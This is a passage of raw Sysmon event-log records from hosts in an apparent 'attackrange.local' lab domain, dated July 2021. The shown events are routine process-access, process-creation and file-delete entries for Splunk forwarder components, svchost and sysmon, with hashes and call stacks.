Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808133Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.957{0C1E0330-F56E-60EB-8C79-00000000D001}504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808132Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.737{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E582164F785ED2DEDE092E3431B47328,SHA256=3A928611B0F0C22BB87EB05967B2F15722714F962FEDD56686D2F5D274A8C403,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000808131Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.596{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0160BBF0C0202DEB23F9EFD697035D6C,SHA256=C3C6EA69D5D7301EDBB9D2AD1EA735D13574FAEA27CF00B272CAD37A0B3727CB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808130Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.300{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F56E-60EB-8B79-00000000D001}2688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808129Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:26.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808128Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808127Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:26.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808126Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808125Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:26.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808124Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808123Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:26.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808122Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808121Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:26.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808120Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.284{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F56E-60EB-8B79-00000000D001}2688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808119Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.284{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F56E-60EB-8B79-00000000D001}2688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808118Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.285{0C1E0330-F56E-60EB-8B79-00000000D001}2688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050129Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:27.828{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7F6DD866191EF6E67B76D188C6E3196,SHA256=89DAB9EA34E505631F63CBDFF1B8659CFB082761D7C3860CD8E05CF30F6B90CE,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x8000000000000000808161Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:27.815{0C1E0330-F56F-60EB-8D79-00000000D001}4048360C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808160Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:27.659{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F56F-60EB-8D79-00000000D001}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808159Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:27.659{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808158Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:27.659{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808157Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:27.659{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808156Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:27.659{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808155Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:27.659{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808154Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:27.659{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808153Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:27.659{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808152Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:27.659{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808151Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
